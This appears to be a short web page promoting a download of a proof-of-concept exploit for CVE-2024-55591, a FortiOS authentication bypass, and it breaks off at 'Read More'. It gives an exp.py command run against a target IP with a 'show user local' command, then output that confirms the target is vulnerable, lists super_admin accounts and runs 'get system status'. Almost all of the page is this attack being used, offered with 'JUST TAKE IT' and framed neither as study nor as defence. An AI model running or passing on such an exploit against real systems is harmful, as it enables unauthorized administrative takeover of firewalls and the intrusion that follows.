CVE-2024-55591: FortiOS Authentication Bypass If you’re reading this, you most likely know what we’re talking about. Download – JUST TAKE IT Detection in Action “` python3 exp.py –host 192.104.119.11 –port 443 –command "show user local" –ssl ██████╗ ██╗███╗ ██╗ █████╗ ██████╗ ██╗ ██╗ ██╗ ██╗ █████╗ ██████╗ ███╗ ███╗ ██╔══██╗██║████╗ ██║██╔══██╗██╔══██╗╚██╗ ██╔╝ ██║ ██║██╔══██╗██╔══██╗████╗ ████║ ██████╔╝██║██╔██╗ ██║███████║██████╔╝ ╚████╔╝ ██║ █╗ ██║███████║██████╔╝██╔████╔██║ ██╔══██╗██║██║╚██╗██║██╔══██║██╔══██╗ ╚██╔╝ ██║███╗██║██╔══██║██╔══██╗██║╚██╔╝██║ ██████╔╝██║██║ ╚████║██║ ██║██║ ██║ ██║ ╚███╔███╔╝██║ ██║██║ ██║██║ ╚═╝ ██║ ╚═════╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ exp.py (*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC CVEs: [CVE-2024-55591] [*] Checking if target is a FortiOS Management interface [*] Target is confirmed as a FortiOS Management interface [*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337 Output from server: � get system status Output from server: �~�FAKESERIAL #…Read More